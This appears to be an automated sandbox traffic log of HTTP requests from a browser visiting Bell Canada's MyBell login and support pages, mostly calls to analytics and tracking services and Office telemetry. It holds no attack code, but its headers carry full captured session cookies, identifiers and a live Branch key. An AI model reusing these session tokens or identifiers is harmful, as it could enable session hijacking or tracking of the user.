Source: global trafficHTTP traffic detected: GET /_r?sdk=web2.85.0&_t=1380522052703713689&branch_key=key_live_adAu45V2R6wos7hoIYdA7flfytp07fPD&callback=branch_callback__1 HTTP/1.1Host: app.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mybell.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _s=bSIHRGqn9rL3nJ2hRxT4ssO5k%2FFjfBiEcV6oWbASilINqVOmeni4p8hvKqSbWcObIf-None-Match: W/"5b-hvtL0tnfNR8vlzOVIQeVwry/ot0"
Source: global trafficHTTP traffic detected: GET /egw/5/qceuv8449dzg58ptt1bhda9g8ue19c7s/track/__cool.gif?data=eyJldmVudHMiOiBbCiAgICB7InNlc3Npb25fc2NyZWVuX3NpemUiOiAiMTI4MHgxMDI0Iiwic2Vzc2lvbl9kdWEiOiAiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExNy4wLjAuMCBTYWZhcmkvNTM3LjM2Iiwic2Vzc2lvbl9wbGF0Zm9ybSI6ICJXaW4zMiIsInBhZ2VfdGl0bGUiOiAiTG9nIGluIHRvIE15QmVsbCIsInBhZ2VfdXJsIjogImh0dHBzOi8vbXliZWxsLmJlbGwuY2EvTG9naW4/bGFuZ3VhZ2U9ZW4iLCJ0cmFja2VyX3R5cGUiOiAiamF2YXNjcmlwdCIsInRyYWNrZXJfdmVyc2lvbiI6ICIyLjIuMjMiLCJldmVudF9uYW1lIjogInNlc3Npb25fc3RhcnQiLCJldmVudF90aW1lc3RhbXBfZXBvY2giOiAiMTczMDM4MDM1MTM2NSIsImV2ZW50X3RpbWV6b25lX29mZnNldCI6IC00LCJ1c2VyX2lkIjogIjE5MmUyYjRjNzdhNjRkLTA4ZDNlOGUyNGFiOGRjLTI2MDMxZTUxLTE0MDAwMC0xOTJlMmI0Yzc3YjY0ZiIsInVybCI6ICJodHRwczovL215YmVsbC5iZWxsLmNhL0xvZ2luP2xhbmd1YWdlPWVuIiwiZm9ybUlkIjogbnVsbCwiZm9ybVRyaWdnZXJUeXBlIjogbnVsbCwia2FtcHlsZV9kYXRhIjogeyJtZF9pc1N1cnZleVN1Ym1pdHRlZEluU2Vzc2lvbiI6ICIiLCJMQVNUX0lOVklUQVRJT05fVklFVyI6ICIiLCJERUNMSU5FRF9EQVRFIjogIiIsImthbXB5bGVJbnZpdGVQcmVzZW50ZWQiOiAiIiwia2FtcHlsZV91c2VyaWQiOiAiYTc5Ny05OGZmLTE4ZmYtOWNkNS0wNmRkLTRiZmYtMzRkMi1hYmI5Iiwia2FtcHlsZVVzZXJTZXNzaW9uIjogIjE3MzAzODAzNTEzNjIiLCJrYW1weWxlVXNlclBlcmNlbnRpbGUiOiAiIiwiU1VCTUlUVEVEX0RBVEUiOiAiIn0sImNvb2tpZV9zaXplIjogMjcxOSwia2FtcHlsZV92ZXJzaW9uIjogIjIuNTcuMCIsIm9uc2l0ZV92ZXJzaW9uIjogIjIuNTcuMCIsImhpc3RvcnlfbGVuZ3RoIjogMSwiZXZlbnRfbG9jYWxfdGltZXN0YW1wIjogMTczMDM4MDM1MTM2NSwicG9zaXRpb24iOiBudWxsLCJpc1VzZXJJZGVudGlmaWVkIjogZmFsc2V9Cl19 HTTP/1.1Host: udc-neb.kampyle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_r?sdk=web2.85.0&_t=1380522052703713689&branch_key=key_live_adAu45V2R6wos7hoIYdA7flfytp07fPD&callback=branch_callback__12 HTTP/1.1Host: app.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mybell.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _s=bSIHRGqn9rL3nJ2hRxT4ssO5k%2FFjfBiEcV6oWbASilINqVOmeni4p8hvKqSbWcOb
Source: global trafficHTTP traffic detected: GET /_r?sdk=web2.85.0&_t=1380522052703713689&branch_key=key_live_adAu45V2R6wos7hoIYdA7flfytp07fPD&callback=branch_callback__0 HTTP/1.1Host: app.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _s=bSIHRGqn9rL3nJ2hRxT4ssO5k%2FFjfBiEcV6oWbASilINqVOmeni4p8hvKqSbWcOb
Source: global trafficHTTP traffic detected: GET /rb_bced360d-a02a-4b73-b0e7-46fe5ae1dc34?type=js3&sn=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0&svrid=8&flavor=post&vi=OSRWPKERGJKLBVFCIANBBATQHLJBBKCA-0&modifiedSince=1730276476420&rf=https%3A%2F%2Fmybell.bell.ca%2FLogin%3F_branch_match_id%3D1380522052703713689%26_branch_referrer%3DH4sIAAAAAAAAA8soKSkottLXz9VLSs3J0UtO1C8uLSjILyopKkzOT0m1rytKTUstKsrMS49PKsovL04tsnXOKMrPTQUAvip8pzkAAAA%253D%23EXT%3Dbranch_supportrqcode&bp=3&app=429b1eac4514c5ce&crc=931189169&en=gticcd0a&end=1 HTTP/1.1Host: mybell.bell.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; rxVisitor=17303803184158NV4F74O1KFTJ2EO5K4UAGQSTA0OEH7F; dtSa=-; __cwaf=true; ASP.NET_SessionId=xekfkxdqg0g3hnhhj5c40x2j; at_check=true; AMCVS_48B034FA53CF9FD10A490D44%40AdobeOrg=1; AKA_A2=A; zone=zone=&city=Killeen&pcd=&isp=&ispconnectiontype=; TLP020a4695=028702b9c9c05a52921ccf3c31971699d213c39112484a31e547d2c2ffd38687ed59a36d0d4e2c0fc94de624e710b589015e25b0a3d820fda1dd28f1c1d871dd22fc12e6551b85cc0f44234e0afad0602c52a8cfebcfcf76961c87bb9de0e4034f922fa52610cf06c4bd0238fec9db15133395a516b29fc258302c7437258fc2b9533f20552b7afc5e2687b7696ede3c85851dd344ebbe563d42f62457d7f06efc569272c8603ab277efb2634e0358dfc98b74cf5c; AMCV_48B034FA53CF9FD10A490D44%40AdobeOrg=179643557%7CMCIDTS%7C20028%7CMCMID%7C26404690240998747124274156036452379072%7CMCAAMLH-1730985129%7C6%7CMCAAMB-1730985129%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730387529s%7CNONE%7CMCSYNCSOP%7C411-20035%7CvVersion%7C5.5.0; s_cc=true; gemini=region=ON|language=en|province=ON|LarSegmentType=undefined; _gcl_au=1.1.441004151.1730380345; BSCC=LoginSplashReturnURL=%2fLogin%3f_branch_match_id%3d1380522052703713689%26_branch_referrer%3dH4sIAAAAAAAAA8soKSkottLXz9VLSs3J0UtO1C8uLSjILyopKkzOT0m1rytKTUstKsrMS49PKsovL04tsnXOKMrPTQUAvip8pzkAAAA%253D; TLP025e8c23=028702b9c9692b4dde036b6f48311953767db06bb285a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c29da432a12f8fa973d6859ab4b9bf95d3d7ea5f56b8892bb8e17037a1f126e985c999dbd1d07c44d5ec8afaf2f6bb844bb17f3c07a5a7f83
Source: global trafficHTTP traffic detected: GET /_r?sdk=web2.85.0&_t=1380522052703713689&branch_key=key_live_adAu45V2R6wos7hoIYdA7flfytp07fPD&callback=branch_callback__5 HTTP/1.1Host: app.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _s=bSIHRGqn9rL3nJ2hRxT4ssO5k%2FFjfBiEcV6oWbASilINqVOmeni4p8hvKqSbWcOb
Source: global trafficHTTP traffic detected: GET /_r?sdk=web2.85.0&_t=1380522052703713689&branch_key=key_live_adAu45V2R6wos7hoIYdA7flfytp07fPD&callback=branch_callback__4 HTTP/1.1Host: app.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _s=bSIHRGqn9rL3nJ2hRxT4ssO5k%2FFjfBiEcV6oWbASilINqVOmeni4p8hvKqSbWcOb
Source: global trafficHTTP traffic detected: GET /i/14028/da/?type=multi&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380341691&dc=20&dv=1&dl=216 HTTP/1.1Host: collection.decibelinsight.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: da_lid=-B7D567C29E92EA123347BB99E4B686613C|0|0|0; da_sid=84E654F18AD2AE89A616AA13A6B4CC6A8F.1|3|0|3
Source: global trafficHTTP traffic detected: GET /_r?sdk=web2.85.0&_t=1380522052703713689&branch_key=key_live_adAu45V2R6wos7hoIYdA7flfytp07fPD&callback=branch_callback__2 HTTP/1.1Host: app.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mybell.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _s=bSIHRGqn9rL3nJ2hRxT4ssO5k%2FFjfBiEcV6oWbASilINqVOmeni4p8hvKqSbWcObIf-None-Match: W/"5b-w7nl+eIlRXyZ+Jvk9VGUx28ptww"
Source: global trafficHTTP traffic detected: GET /recaptcha/enterprise/bcn?k=6LeIfTIaAAAAAHMPXsezv4PdsckDc-wAJU-eo2YP HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIo7bJAQipncoBCNT9ygEIkqHLAQiFoM0BCLnKzQEIidPNAQip1c0BGOmYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09ANOXeZxfxzYBwcz7Gnvqu3Y83ZbiHyue1AJYczF16kXnMrYQu4vUb1Eg9Z0jpwvMDzXecLZHMeVchD3odA4owgc
Source: global trafficHTTP traffic detected: GET /v1/open HTTP/1.1Host: api2.branch.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uwt.js HTTP/1.1Host: static.ads-twitter.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://support.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bat.js HTTP/1.1Host: bat.bing.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://support.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: MUID=3C32A0BCB9AE6F030E85B595B85F6EBE
Source: global trafficHTTP traffic detected: GET /js/siteanalyze_1154.js HTTP/1.1Host: siteimproveanalytics.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://support.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /scevent.min.js HTTP/1.1Host: sc-static.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://support.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_r?sdk=web2.85.0&_t=1380522052703713689&branch_key=key_live_adAu45V2R6wos7hoIYdA7flfytp07fPD&callback=branch_callback__2 HTTP/1.1Host: app.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://support.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _s=bSIHRGqn9rL3nJ2hRxT4ssO5k%2FFjfBiEcV6oWbASilINqVOmeni4p8hvKqSbWcObIf-None-Match: W/"5b-w7nl+eIlRXyZ+Jvk9VGUx28ptww"
Source: global trafficHTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /TeaLeaf/TealeafTarget.aspx HTTP/1.1Host: mybell.bell.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; rxVisitor=17303803184158NV4F74O1KFTJ2EO5K4UAGQSTA0OEH7F; dtSa=-; __cwaf=true; ASP.NET_SessionId=xekfkxdqg0g3hnhhj5c40x2j; at_check=true; AMCVS_48B034FA53CF9FD10A490D44%40AdobeOrg=1; AKA_A2=A; zone=zone=&city=Killeen&pcd=&isp=&ispconnectiontype=; TLP020a4695=028702b9c9c05a52921ccf3c31971699d213c39112484a31e547d2c2ffd38687ed59a36d0d4e2c0fc94de624e710b589015e25b0a3d820fda1dd28f1c1d871dd22fc12e6551b85cc0f44234e0afad0602c52a8cfebcfcf76961c87bb9de0e4034f922fa52610cf06c4bd0238fec9db15133395a516b29fc258302c7437258fc2b9533f20552b7afc5e2687b7696ede3c85851dd344ebbe563d42f62457d7f06efc569272c8603ab277efb2634e0358dfc98b74cf5c; AMCV_48B034FA53CF9FD10A490D44%40AdobeOrg=179643557%7CMCIDTS%7C20028%7CMCMID%7C26404690240998747124274156036452379072%7CMCAAMLH-1730985129%7C6%7CMCAAMB-1730985129%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730387529s%7CNONE%7CMCSYNCSOP%7C411-20035%7CvVersion%7C5.5.0; s_cc=true; gemini=region=ON|language=en|province=ON|LarSegmentType=undefined; _gcl_au=1.1.441004151.1730380345; BSCC=LoginSplashReturnURL=%2fLogin%3f_branch_match_id%3d1380522052703713689%26_branch_referrer%3dH4sIAAAAAAAAA8soKSkottLXz9VLSs3J0UtO1C8uLSjILyopKkzOT0m1rytKTUstKsrMS49PKsovL04tsnXOKMrPTQUAvip8pzkAAAA%253D; TLP025e8c23=028702b9c9692b4dde036b6f48311953767db06bb285a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c29da432a12f8fa973d6859ab4b9bf95d3d7ea5f56b8892bb8e17037a1f126e985c999dbd1d07c44d5ec8afaf2f6bb844bb17f3c07a5a7f83cd49351c2a911a5ca947d27a817d368faf54ae7e50a1842d2b57eac716f3ff3d0a55c9e8e128aa760d11afd37cabc7f1a9c13b24f5f873137471b379be7b6e2d795395816a5e8e1f2e418f6d39798439073d7d47d8e5abb89ebedced3714008024baabac0c69bb2b73489c2f92cfe3f6a21e9266ad18a9c7cb790e717910a9e948fabaca8f62d40d2453a6de990f7f33c7a1d85b4a989e357ccfff80ec2e3cb27aa1f5a73d036513baa2d2abdce10e77339c62a8affda7f305fa37c0ac2205be35ede10778493b158f1f1e1a6959a697f73147ac5311b7831b3fc19af85631ac85ef42f6348c117fb4da443ecd17f5697ed6f1588649dddab457ecda2b35cd23c48
Source: global trafficHTTP traffic detected: GET /rb_bced360d-a02a-4b73-b0e7-46fe5ae1dc34?type=js3&sn=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0&svrid=8&flavor=post&vi=OSRWPKERGJKLBVFCIANBBATQHLJBBKCA-0&modifiedSince=1730276476420&rf=https%3A%2F%2Fmybell.bell.ca%2FLogin%3F_branch_match_id%3D1380522052703713689%26_branch_referrer%3DH4sIAAAAAAAAA8soKSkottLXz9VLSs3J0UtO1C8uLSjILyopKkzOT0m1rytKTUstKsrMS49PKsovL04tsnXOKMrPTQUAvip8pzkAAAA%253D%23EXT%3Dbranch_supportrqcode&bp=3&app=429b1eac4514c5ce&crc=1467579985&en=gticcd0a&end=1 HTTP/1.1Host: mybell.bell.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; rxVisitor=17303803184158NV4F74O1KFTJ2EO5K4UAGQSTA0OEH7F; dtSa=-; __cwaf=true; ASP.NET_SessionId=xekfkxdqg0g3hnhhj5c40x2j; at_check=true; AMCVS_48B034FA53CF9FD10A490D44%40AdobeOrg=1; AKA_A2=A; zone=zone=&city=Killeen&pcd=&isp=&ispconnectiontype=; TLP020a4695=028702b9c9c05a52921ccf3c31971699d213c39112484a31e547d2c2ffd38687ed59a36d0d4e2c0fc94de624e710b589015e25b0a3d820fda1dd28f1c1d871dd22fc12e6551b85cc0f44234e0afad0602c52a8cfebcfcf76961c87bb9de0e4034f922fa52610cf06c4bd0238fec9db15133395a516b29fc258302c7437258fc2b9533f20552b7afc5e2687b7696ede3c85851dd344ebbe563d42f62457d7f06efc569272c8603ab277efb2634e0358dfc98b74cf5c; AMCV_48B034FA53CF9FD10A490D44%40AdobeOrg=179643557%7CMCIDTS%7C20028%7CMCMID%7C26404690240998747124274156036452379072%7CMCAAMLH-1730985129%7C6%7CMCAAMB-1730985129%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730387529s%7CNONE%7CMCSYNCSOP%7C411-20035%7CvVersion%7C5.5.0; s_cc=true; gemini=region=ON|language=en|province=ON|LarSegmentType=undefined; _gcl_au=1.1.441004151.1730380345; BSCC=LoginSplashReturnURL=%2fLogin%3f_branch_match_id%3d1380522052703713689%26_branch_referrer%3dH4sIAAAAAAAAA8soKSkottLXz9VLSs3J0UtO1C8uLSjILyopKkzOT0m1rytKTUstKsrMS49PKsovL04tsnXOKMrPTQUAvip8pzkAAAA%253D; TLP025e8c23=028702b9c9692b4dde036b6f48311953767db06bb285a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c29da432a12f8fa973d6859ab4b9bf95d3d7ea5f56b8892bb8e17037a1f126e985c999dbd1d07c44d5ec8afaf2f6bb844bb17f3c07a5a7f8
Source: global trafficHTTP traffic detected: GET /v1/qceuv8449dzg58ptt1bhda9g8ue19c7s/track HTTP/1.1Host: udc-neb.kampyle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wdccan/36793/onsite/embed.js HTTP/1.1Host: resources.digital-cloud.medallia.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "ab480182e18a16841a9028d8857825bb"If-Modified-Since: Wed, 30 Oct 2024 09:03:40 GMT
